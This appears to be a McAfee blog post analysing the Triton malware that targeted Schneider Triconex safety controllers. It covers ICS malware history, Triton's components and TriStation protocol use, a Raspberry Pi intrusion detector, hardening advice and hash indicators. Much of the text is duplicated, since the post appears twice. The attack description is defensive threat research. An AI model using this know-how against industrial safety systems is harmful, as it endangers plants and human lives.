ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.